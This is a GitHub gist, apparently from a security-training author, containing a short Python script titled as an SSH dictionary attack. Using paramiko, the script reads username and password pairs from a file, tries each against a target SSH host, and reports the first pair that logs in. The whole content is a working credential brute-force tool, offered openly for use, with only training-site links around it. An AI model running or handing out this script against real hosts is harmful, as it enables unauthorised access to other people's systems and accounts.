Skip to content

Instantly share code, notes, and snippets.

@securitytube
Created April 4, 2013 06:24
Show Gist options
  • Star 8 You must be signed in to star a gist
  • Fork 4 You must be signed in to fork a gist
  • Save securitytube/5308280 to your computer and use it in GitHub Desktop.
Save securitytube/5308280 to your computer and use it in GitHub Desktop.
SSH Dictionary Attack using Usernames and Password Lists
#!/usr/bin/env python
"""
Author: Vivek Ramachandran
Website: http://SecurityTube.net
Online Infosec Training: http://SecurityTube-Training.com
"""
import paramiko
import sys
def AttackSSH(ipAddress, dictionaryFile) :
print "[+] Attacking Host : %s " %ipAddress
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
for line in open(dictionaryFile, "r").readlines() :
[username, password] = line.strip().split()
try :
print "[+] Trying to break in with username: %s password: %s " % (username, password)
ssh.connect(ipAddress, username=username, password=password)
except paramiko.AuthenticationException:
print "[-] Failed! ..."
continue
print "[+] Success ... username: %s and passoword %s is VALID! " % (username, password)
break
if __name__ == "__main__" :
AttackSSH(sys.argv[1], sys.argv[2])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment